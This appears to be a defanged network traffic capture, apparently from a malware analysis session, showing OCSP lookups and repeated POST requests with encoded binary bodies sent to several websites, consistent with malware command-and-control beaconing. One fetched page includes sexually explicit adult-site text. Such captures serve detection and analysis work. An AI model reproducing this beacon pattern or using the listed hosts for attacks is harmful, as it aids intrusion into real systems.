Content-Length: 527
ETag: "D09F5B0D89CDA74A89E8B0D4B7FECD8D5FB1C4F2DADD102B2E2C3EB45E0E7719"
Last-Modified: Thu, 29 Jun 2017 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=1180
Expires: Sat, 01 Jul 2017 11:36:50 GMT
Date: Sat, 01 Jul 2017 11:17:10 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170629163100Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........?Y.ny.._QN...L
.......20170629160000Z....20170706160000Z0...*.H..................A..0
.$c..P.g.......;,..eOj.0.$..D...... 7*.]......PA...fhwC.23....(.F.....
...T...f....,8.B.J..im.Jz......=<T;V.S..p....L..G&1.4...q.w`N......
......?c.#.m.B.wI;:z..z}.....3..\u.p.|.5.._!...o..........!._!......Y'
..R.`.Q..j...'v..\.e._.....'. Q~..}.....HTTP/1.1 200 OK..Server: nginx
..Content-Type: application/ocsp-response..Content-Length: 527..ETag:
"D09F5B0D89CDA74A89E8B0D4B7FECD8D5FB1C4F2DADD102B2E2C3EB45E0E7719"..La
st-Modified: Thu, 29 Jun 2017 16:00:00 UTC..Cache-Control: public, no-
transform, must-revalidate, max-age=1180..Expires: Sat, 01 Jul 2017 11
:36:50 GMT..Date: Sat, 01 Jul 2017 11:17:10 GMT..Connection: keep-aliv
e..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Le
t's Encrypt1#0!..U....Let's Encrypt Authority X3..20170629163100Z0u0s0
K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........?Y.ny.._QN.
..L.......20170629160000Z....20170706160000Z0...*.H..................A
..0.$c..P.g.......;,..eOj.0.$..D...... 7*.]......PA...fhwC.23....(.F..
......T...f....,8.B.J..im.Jz......=<T;V.S..p....L..G&1.4...q.w`N...
.........?c.#.m.B.wI;:z..z}.....3..\u.p.|.5.._!...o..........!._!.....
.Y'..R.`.Q..j...'v..\.e._.....'. Q~..}.....
....

<<< skipped >>>

GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP0moYiJ98Ac0H22dRrLwXjjg== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "C89EE318E2E8710109CE9BDDC1C2F5378C21F1CA13029FCC8645A99F5F9A7B6E"
Last-Modified: Sat, 14 Jan 2017 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=0
Expires: Sat, 01 Jul 2017 11:17:13 GMT
Date: Sat, 01 Jul 2017 11:17:13 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170114202300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........."'..sA...k/
.......20170114200000Z....20170121200000Z0...*.H.............E?.....G.
...Ep..0....\.l.9.u...s......3..~.b....*D...|."uL.2..W...YjS..........
..YW1|d..p..Wbu.t.UoB....:...........m...l#....[....?(R..2..a.....:d!.
P....%.?.!......{...'..f...u..#..=.K.W..7.{....gH.y/....M.....BX..B..h
C.]`H ....R.....B.Nx...j.R.&N....#u..HTTP/1.1 200 OK..Server: nginx..C
ontent-Type: application/ocsp-response..Content-Length: 527..ETag: "C8
9EE318E2E8710109CE9BDDC1C2F5378C21F1CA13029FCC8645A99F5F9A7B6E"..Last-
Modified: Sat, 14 Jan 2017 20:00:00 UTC..Cache-Control: public, no-tra
nsform, must-revalidate, max-age=0..Expires: Sat, 01 Jul 2017 11:17:13
GMT..Date: Sat, 01 Jul 2017 11:17:13 GMT..Connection: keep-alive..0..
........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's En
crypt1#0!..U....Let's Encrypt Authority X3..20170114202300Z0u0s0K0...
........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........."'..sA...k/...
....20170114200000Z....20170121200000Z0...*.H.............E?.....G....
Ep..0....\.l.9.u...s......3..~.b....*D...|."uL.2..W...YjS............Y
W1|d..p..Wbu.t.UoB....:...........m...l#....[....?(R..2..a.....:d!.P..
..%.?.!......{...'..f...u..#..=.K.W..7.{....gH.y/....M.....BX..B..hC.]
`H ....R.....B.Nx...j.R.&N....#u..
....

<<< skipped >>>

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP9tcSTUD5w2OMP5jJLv/9/qQ== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "06A7D93C2DDB7B95657ED5C2F1E5B035D91958EF6B75B73E756111CAA95B0B0C"
Last-Modified: Thu, 29 Jun 2017 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=27824
Expires: Sat, 01 Jul 2017 19:00:57 GMT
Date: Sat, 01 Jul 2017 11:17:13 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170629074100Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee............P>p....
2K........20170629070000Z....20170706070000Z0...*.H..............`....
...gy.$?.....ho..^l..?..f.7...x1.}...b....An.0.1..7J....^3Sl...[r..g#L
n.(.....y.\..3V.t.s.."k....62.AQ3.D......3..kMS..5.....,Y...L.6p.=..2.
,.{m.l?L....g..o..7HKN.W.G..F...qWO...l..32G.z[...yy. .l.O..'....)....
..l...R.3i..M~/."a.......0.....*`.$....NHTTP/1.1 200 OK..Server: nginx
..Content-Type: application/ocsp-response..Content-Length: 527..ETag:
"06A7D93C2DDB7B95657ED5C2F1E5B035D91958EF6B75B73E756111CAA95B0B0C"..La
st-Modified: Thu, 29 Jun 2017 07:00:00 UTC..Cache-Control: public, no-
transform, must-revalidate, max-age=27824..Expires: Sat, 01 Jul 2017 1
9:00:57 GMT..Date: Sat, 01 Jul 2017 11:17:13 GMT..Connection: keep-ali
ve..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....L
et's Encrypt1#0!..U....Let's Encrypt Authority X3..20170629074100Z0u0s
0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee............P>p
....2K........20170629070000Z....20170706070000Z0...*.H..............`
.......gy.$?.....ho..^l..?..f.7...x1.}...b....An.0.1..7J....^3Sl...[r.
.g#Ln.(.....y.\..3V.t.s.."k....62.AQ3.D......3..kMS..5.....,Y...L.6p.=
..2.,.{m.l?L....g..o..7HKN.W.G..F...qWO...l..32G.z[...yy. .l.O..'....)
......l...R.3i..M~/."a.......0.....*`.$....N
....

<<< skipped >>>

GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP0moYiJ98Ac0H22dRrLwXjjg== HTTP/1.1

Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "C89EE318E2E8710109CE9BDDC1C2F5378C21F1CA13029FCC8645A99F5F9A7B6E"
Last-Modified: Sat, 14 Jan 2017 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=0
Expires: Sat, 01 Jul 2017 11:17:18 GMT
Date: Sat, 01 Jul 2017 11:17:18 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170114202300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........."'..sA...k/
.......20170114200000Z....20170121200000Z0...*.H.............E?.....G.
...Ep..0....\.l.9.u...s......3..~.b....*D...|."uL.2..W...YjS..........
..YW1|d..p..Wbu.t.UoB....:...........m...l#....[....?(R..2..a.....:d!.
P....%.?.!......{...'..f...u..#..=.K.W..7.{....gH.y/....M.....BX..B..h
C.]`H ....R.....B.Nx...j.R.&N....#u..HTTP/1.1 200 OK..Server: nginx..C
ontent-Type: application/ocsp-response..Content-Length: 527..ETag: "C8
9EE318E2E8710109CE9BDDC1C2F5378C21F1CA13029FCC8645A99F5F9A7B6E"..Last-
Modified: Sat, 14 Jan 2017 20:00:00 UTC..Cache-Control: public, no-tra
nsform, must-revalidate, max-age=0..Expires: Sat, 01 Jul 2017 11:17:18
GMT..Date: Sat, 01 Jul 2017 11:17:18 GMT..Connection: keep-alive..0..
........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's En
crypt1#0!..U....Let's Encrypt Authority X3..20170114202300Z0u0s0K0...
........~.j.r..... dl..-`q.]...Jjc.}....9..Ee..........."'..sA...k/...
....20170114200000Z....20170121200000Z0...*.H.............E?.....G....
Ep..0....\.l.9.u...s......3..~.b....*D...|."uL.2..W...YjS............Y
W1|d..p..Wbu.t.UoB....:...........m...l#....[....?(R..2..a.....:d!.P..
..%.?.!......{...'..f...u..#..=.K.W..7.{....gH.y/....M.....BX..B..hC.]
`H ....R.....B.Nx...j.R.&N....#u..
....

<<< skipped >>>

GET //MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMJRuTyDL2SSO5n1lQa6eyAQw== HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "13CB077A961E66D779CA7DF0AD91FD293307D6CB0328128D4E87586B8C0776D9"
Last-Modified: Thu, 29 Jun 2017 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=35232
Expires: Sat, 01 Jul 2017 21:04:45 GMT
Date: Sat, 01 Jul 2017 11:17:33 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170629201000Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee.........F.....H.g.T..
..C....20170629200000Z....20170706200000Z0...*.H..................5.t.
........g(y0....J_I...hY.........Wi...X....p.?.p8:......u........R.Wz.
.(.eAh...=[..n[,.>m..t1.`%}...._..-..a.....=$......Z.Z....D0.Jp....
E..JL..j~..C$.V..`Q..!DR{*.6qd.(...$.m...^.....j..lq7).[..."...3.w|<
;......->,.K......dT|.!.]......i[..$X...L..HTTP/1.1 200 OK..Server:
nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "13CB077A961E66D779CA7DF0AD91FD293307D6CB0328128D4E87586B8C0776D
9"..Last-Modified: Thu, 29 Jun 2017 20:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=35232..Expires: Sat, 01 Jul
2017 21:04:45 GMT..Date: Sat, 01 Jul 2017 11:17:33 GMT..Connection: ke
ep-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...
U....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..2017062920100
0Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee.........F..
...H.g.T....C....20170629200000Z....20170706200000Z0...*.H............
......5.t.........g(y0....J_I...hY.........Wi...X....p.?.p8:......u...
.....R.Wz..(.eAh...=[..n[,.>m..t1.`%}...._..-..a.....=$......Z.Z...
.D0.Jp....E..JL..j~..C$.V..`Q..!DR{*.6qd.(...$.m...^.....j..lq7).[..."
...3.w|<......->,.K......dT|.!.]......i[..$X...L....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: starmedia.ca
Connection: Keep-Alive
Cache-Control: no-cache

9IXoILWsdWFVAaREHNbl7646qPJD5qYeudwEDKl4Iz6aZdpE1uA8uMX0xKXhrKPr4G8yv82X3qn4Ol1ttn9eTgzXupZ3waJZ3SWMue 0xqDQmv YYQz46 FyNRmuqTIDuBswSYStlknrNccJ8JbcASLVi7KotIoSflr/XCS8MJ5EDKaEpMNAT8QzQrl1N9qSgKFoG/5BNuNbfLgPwVVaeY Qf8iTbd G4CPpGBOi CE98GAhS6WCLPKR4EO9ru9W Jl/rG43/4YuLz7nrMTZyhUO8DegBh/SY4pt4 OCFEwiupfvOlg6ytqPHX5xAh1ZMPo/Dkt0F35NqEOABtfWYmljTihJjJQSh DopSIqKJhkU/l29qjiPJf8VLvtrmS/X SERXUEBE j//2xLScyYMnHcKDww96x20oLNBzNg3m95UviMcUSqhBkEaIfoYm4mWl27JGsiTcfKpDD
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dd6652f4d32ed9eb8bd8188bc5554f12c1498907802; expires=Sun, 01-Jul-18 11:16:42 GMT; path=/; domain=.starmedia.ca; HttpOnly
Server: cloudflare-nginx
CF-RAY: 3778f463b3f28430-KBP
f92..<!DOCTYPE html>.<html lang="en" class="no-js">.<he
ad>.<meta charset="utf-8">.<meta http-equiv="X-UA-Compatib
le" content="IE=edge,chrome=1">.<meta name="viewport" content="w
idth=device-width, initial-scale=1, maximum-scale=1">.<link href
='hXXp://fonts.googleapis.com/css?family=Roboto:400,100,100italic,300,
300italic,400italic,500,500italic,700,700italic' rel='stylesheet' type
='text/css'>.<link rel="stylesheet" type="text/css" href="http:/
/starmedia.ca/css/bootstrap.css" media="screen">..<!-- REVOLUTIO
N BANNER CSS SETTINGS -->.<link rel="stylesheet" type="text/css"
href="hXXp://starmedia.ca/css/fullwidth.css" media="screen" />.<
;link rel="stylesheet" type="text/css" href="hXXp://starmedia.ca/css/s
ettings.css" media="screen" />.<link rel="stylesheet" type="text
/css" href="hXXp://starmedia.ca/css/magnific-popup.css" media="screen"
>.<link rel="stylesheet" type="text/css" href="hXXp://starmedia.
ca/css/owl.carousel.css" media="screen">.<link rel="stylesheet"
type="text/css" href="hXXp://starmedia.ca/css/owl.theme.css" media="sc
reen">.<link rel="stylesheet" type="text/css" href="hXXp://starm
edia.ca/css/jquery.bxslider.css" media="screen">.<link rel="styl
esheet" type="text/css" href="hXXp://starmedia.ca/css/font-awesome.css
" media="screen">.<link rel="stylesheet" type="text/css" href="h
ttp://starmedia.ca/css/animate.css" media="screen">.<link rel="s
tylesheet" type="text/css" href="hXXp://starmedia.ca/css/style.css

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.photoclubs.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:42 GMT
Server: Apache/1.3.37 (Unix)
X-Powered-By: PHP/4.4.4
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
1007..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="ht
tp://VVV.w3.org/1999/xhtml" lang="en" xml:lang="en">.<script lan
guage=javascript>.if (location.search=="?nc=y") {var console=false}
else {var console=true};.</script>.<head>.<title>Hu
ge Boobs, Tits . Pandora Peaks & Chelsea Charms Giant Boobs & Gigantic
Tits</title>.<meta name="DESCRIPTION" content="Huge Boobs &
Huge Tits photos and video collection . Exclusive Huge Pandora Peaks t
its & Chelsea Charms gigantic tits & giant boobs video collection avai
lable. We provide huge tits photos and video of the biggest gigantic t
its in the world!">.<meta http-equiv="Content-Type" content="tex
t/html; charset=windows-1252">.<meta name="KEYWORDS" content="hu
ge tits, huge boobs, boobs, Chelsea charms, Pandora peaks, giant tits,
giant boobs, gigantic tits, tits">.<meta name="robots" content=
"index, follow, archive" />.<meta http-equiv="Content-Language"
content="en-us">.<meta name="MSSmartTagsPreventParsing" content=
"TRUE">.<meta name="distribution" content="Global">.<meta
name="verify-v1" content="awJZggNm/7BYaMq6RCSMhNMXRjyuGPOUdez a470bUU=
" />.<link rel="stylesheet" type="text/css" href="style.css">
.</head>..<body topmargin="0" onunload="exit();">.<div
align=center>. .<h1>Huge Boobs & Huge Tits Collections -
Enjoy Pandora Peaks & Chelsea Charms Gigantic Tits & Gian

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: photoclubs.com
Connection: Keep-Alive
Cache-Control: no-cache

WE8gwBrJk2FNGPeLPYWatl1B1SEKbxaB7hRuQUSwT iof07ADz9jXj4M1vZOlHRnW8LEXcHEEdGWDh9pGnG6BPTUhaS6ukg1VXVLKD5YPRTVmZR8IHpEVtwXInxzHXTpu5f/k6kBkRvJtNN2ScG2HPhqxPbo422wpc2ob3y 7qy22zQJFK5pwT1n8cX7JyYybBH2aCmbZCfZ1BAFdpJplD5vAx9MgtGMQccgrihYtnfp pntDPZG7abJlN8z6WvvINsLq9l kMj6y5oL7bsY7x/O/hnSl/YwDMSX0kVxIVL6 4d V2ZSV/oNoKP9ZAfDyTIH9tpjQpbqJm2X8CfM/URxH plRakEBtOq2d 7TOBCePEgNgJhtk/3pNMzXUR2bTRgWCcJ7BSR c8g1GXzYGLoTvHu4qtda4IMIUIbcpoeJm5JL8xdBURNrNgAdLY8fWXoNA==
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:42 GMT
Server: Apache/1.3.37 (Unix)
Location: hXXp://VVV.photoclubs.com/
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
12d..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML
><HEAD>.<TITLE>301 Moved Permanently</TITLE>.<
/HEAD><BODY>.<H1>Moved Permanently</H1>.The docum
ent has moved <A HREF="hXXp://VVV.photoclubs.com/">here</A>
;.<P>.<HR>.<ADDRESS>Apache/1.3.37 Server at photoclu
bs.com Port 80</ADDRESS>.</BODY></HTML>...0..HTTP/1.
1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:16:42 GMT..Server:
Apache/1.3.37 (Unix)..Location: hXXp://VVV.photoclubs.com/..Keep-Alive
: timeout=15, max=99..Connection: Keep-Alive..Transfer-Encoding: chunk
ed..Content-Type: text/html; charset=iso-8859-1..12d..<!DOCTYPE HTM
L PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<
TITLE>301 Moved Permanently</TITLE>.</HEAD><BODY>
.<H1>Moved Permanently</H1>.The document has moved <A H
REF="hXXp://VVV.photoclubs.com/">here</A>.<P>.<HR>
;.<ADDRESS>Apache/1.3.37 Server at photoclubs.com Port 80</AD
DRESS>.</BODY></HTML>...0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 436
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: actfactory.net
Connection: Keep-Alive
Cache-Control: no-cache

j25O1MmHhWIq2PuuGO7xs IKOxHnsCOADT8iNdthmy1BNvtrrnrlAhR5jXEkLYTkvL3Ih0c7dguVFFiiZfxSkKofEO2zOlX2lM7RuYOYNqxs7 RkZNmvEvFeYXojEXriYeUgk6Nyvfnz4bq2sDO 7qFulNaj4p04cyh1rpaQUD2vNa8qHtvhYIbXdhvLvWv6Gp7CKd38dxDwqYQzl6rjlEAPfz/tggpGvpIKWj CwWROijaAbAFkt5YOElKNXWSXt/VJn XKiiFWKmj7B6R2LLrPh/D4Au8n5v/jrnD2N3TYC Ohrm72CKN0SHukvpOYuZTtSFxGl1feGhdGRDUiy1zOEtocoJk4T4AD6E4OM2sc26bb4uBFnOwuTRMeRgA4rRE53SNvkY5wXFx1NYc06loSCuytgwMQ4WMB525 nlr55MuNLg==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:43 GMT
Server: Apache
Last-Modified: Wed, 01 Feb 2012 02:28:32 GMT
ETag: "1e044d-7ed-d5f37400"
Accept-Ranges: bytes
Content-Length: 2029
Connection: close
Content-Type: text/html
<HTML lang="ja">.<head>.<title>.....................
.....</title>.<meta http-equiv="Content-Type" content="text/h
tml; charset=EUC-JP">.</head>.<body bgcolor="#FFFFFF">.
<STYLE TYPE="text/css">.<!--.A:link { color:#0000FF }.A:visit
ed { color:#800080 }.A:active { color:#AACC00 }.A:hover { color:#FB00D
C }.-->.</STYLE>...<CENTER>. <TABLE BORDER=4 width=
"581">. <TR>. <TD width="100" rowspan="2"><a
href="hXXp://VVV.wadax.ne.jp/"><img src="ht.tp://VVV.wadax.ne.j
p/image/wadax_logo.gif" border="0" alt="................" ></a&g
t;</TD>. <TD width="459" nowrap>...... ........<fo
nt color="#FF0000"><b><font size=." 1">................
..........</font></b></font></TD>. </TR&
gt;. <TR>. <TD width="459" nowrap>Error 403 Access
Denied (Forbidden)</TD>. </TR>. </TABLE>.<BR
>. <P>.</CENTER>..<p align="center"><b>...
......................................................................
..........</b></p>.<p align="center">...............
..................................................................<
br>. .............................................................
.............<br>. ........ ................................<
;/p>.<p align="center">......................................
...................................</p>.<hr width="60%"&g

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.meubles-jacquelin.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.5.38
Link: <hXXp://VVV.meubles-jacquelin.com/wp-json/>; rel="hXXps://api.w.org/"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
16..<!DOCTYPE html>.<html ..9..lang="ja"..18..>.<head&g
t;.<meta charset="..5..UTF-8..48..">.<meta name="viewport" co
ntent="width=device-width, initial-scale=1">...4e..<link rel="pr
ofile" href="hXXp://gmpg.org/xfn/11">.<link rel="pingback" href=
"..2b..hXXp://VVV.meubles-jacquelin.com/xmlrpc.php..4..">....25..&l
t;title>Voluntary Association</title>...3a..<link rel='dns
-prefetch' href='//fonts.googleapis.com' />...2d..<link rel='dns
-prefetch' href='//s.w.org' />...95..<link rel="alternate" type=
"application/rss xml" title="Voluntary Association » ...........
." href="hXXp://VVV.meubles-jacquelin.com/feed/" />...aa..<link
rel="alternate" type="application/rss xml" title="Voluntary Associatio
n » ........................" href="hXXp://VVV.meubles-jacquelin
.com/comments/feed/" />...3f....<script type="text/javascript"&g
t;....window._wpemojiSettings = ..10d..{"baseUrl":"https:\/\/s.w.org\/
images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.
w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"con
catemoji":"http:\/\/VVV.meubles-jacquelin.com\/wp-includes\/js\/wp-emo
ji-release.min.js?ver=4.8"}}..7b2..;....!function(a,b,c){function d(a)
{var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(
k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32p
x Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,
0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 496
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: selldoor.pl
Connection: Keep-Alive
Cache-Control: no-cache

jEaJWbhNIHIbXmUWOzUCfquV0cIACxtzbMReqVVXwAYFUsptynVfC5PwjzpB6D/JrIULdlwudxpbHutqSTTvg3JYDjmzyYVtDPiW3LCEoSoiVC7jGfWQQNL4/0gGRnl nrgYqbo3V1GhsNo1Apll6XMNXU6PJmmoxaY4d7g6 w66M7/Zjgq4MnwlTgwsoRHcmk 9xXOWM71R/tdeT44XU8SvsWmAYpl9tzb2drh2DPsGd9wsGl5Xrr4q5SWeZiKe/Y5DTYxGCkbzj8ihWyeEFCzpxXUztYfn4HeokTQ190ggwDW5BGHGDqVDiP WVfP/sMRvR4WmytO0r7VGXrSC1 ooGKArbOBXYaW5mGJokaboS5DAzOshyI2uX0QOBVrDCc6zjoFfKbcxQUsWh4V4WobKR2exBbkAmbWVkc96qXmChCK7j8byVsj9YXOSHXE1vYzhp2G374yrE9m FcJRiaoOfTBRpOEw/YMNMe3ZlEApIB/M
HTTP/1.1 302
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Content-Length: 177
Connection: keep-alive
Location: hXXp://selldoor.pl/m/
Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>302 Moved</TITLE>..<
/HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>302 Moved</H1>
;..The document has moved <A HREF="hXXp://selldoor.pl/m/">here&l
t;/A>...</BODY>.</HTML>.
....



GET /m/ HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: selldoor.pl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: IdeaWebServer/v0.80
106..<!DOCTYPE html> .<html>.<head>.<meta charset
="utf-8">.<meta name="viewport" content="width=device-width, ini
tial-scale=1, maximum-scale=1.0, user-scalable=no">.<title>SE
LLDOOR s.c.</title> .<link rel="stylesheet" href="js/jquery.m
obile-1.2.0-alpha.1.min.css" />...e5a..<script src="js/jquery.js
"></script>.<script type="text/javascript">. //<!
[CDATA[. $(document).bind("mobileinit", function () {.
$.mobile.defaultPageTransition = "slide";. $.mobile.load
ingMessage = "Transmisja danych...";....$.mobile.pageLoadErrorMessage.
= "Nieokre..lona lokalizacja";. $.mobile.button.prototype.o
ptions.iconshadow = false;....// loader....$.mobile.loader.prototype.o
ptions.textVisible = true;....$.mobile.loader.prototype.options.theme
= "a";....$.mobile.loader.prototype.options.html = "";. });....
..$(document).ready(function() {...$('#mydupa').live('tap',function(e)
{$(this).addClass("ui-btn-active");user_login_submit() });.......$("#
user_add :input[@name='user_type']").live('change mousedown',function(
event) { ......if($(this).val()=='real').......{........$(".require_fo
r_real").show().......}.............if($(this).val()=='test').......{.
.......$(".require_for_real").hide().......}....}); .......// a tu pob
ieramy skrypt dla danego okna..................});..........</scrip
t>...<script type="text/javascript" src="hXXp://maps.google.com/
maps?file=api&v=2&key=AIzaSyBFr50hmKlgJfdtBLeqSt3f_5ehO4GeqM8">

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: theartofhair.com
Connection: Keep-Alive
Cache-Control: no-cache

j7RMW5usVXSeLGOpsnmxIoTNzowhE5sN/1eC5vbZJADQY5JVhXRaT1fIWo84xOUIdvaY25cLxzskdkbItNcoHvAE1LUklT6PKfbpUttxTdW4MkE18doNQO5Yjaq4CMvLvo G5L5k4fZo gXohAKSG6dZqba/NLE92YyN3wJNkweuaFXa5Fl yzZNMCi4loEe0klRTQTlWeqjo TVtgQ/pNQ3ZhErDVQK/eDEQ2yKmK/Os3AsV2WxVYmqyZI XdIvABE5mb4jIqGnlQ6blpc564cw6BPZqOnuGjBLlRyHphURuZ8w8658jH0IRhlWV07u3aaVAQthelV97aGqy6nV5g2LR7x5bXlBgIUGfSmQDukjf6f/D5 laxnIYCAe0nwpqKWicf3/RWHbQNufhhmd7GQP8p wLBR8HKbbdGvYiLXIwBxk0yetNtEC4RwDbKgeusnd6g==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d8be8d077af85a007d7941ee0d13776931498907824; expires=Sun, 01-Jul-18 11:17:04 GMT; path=/; domain=.theartofhair.com; HttpOnly
Cache-Control: max-age=2
Expires: Sat, 01 Jul 2017 11:17:06 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f4edf0f58243-KBP
159c..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
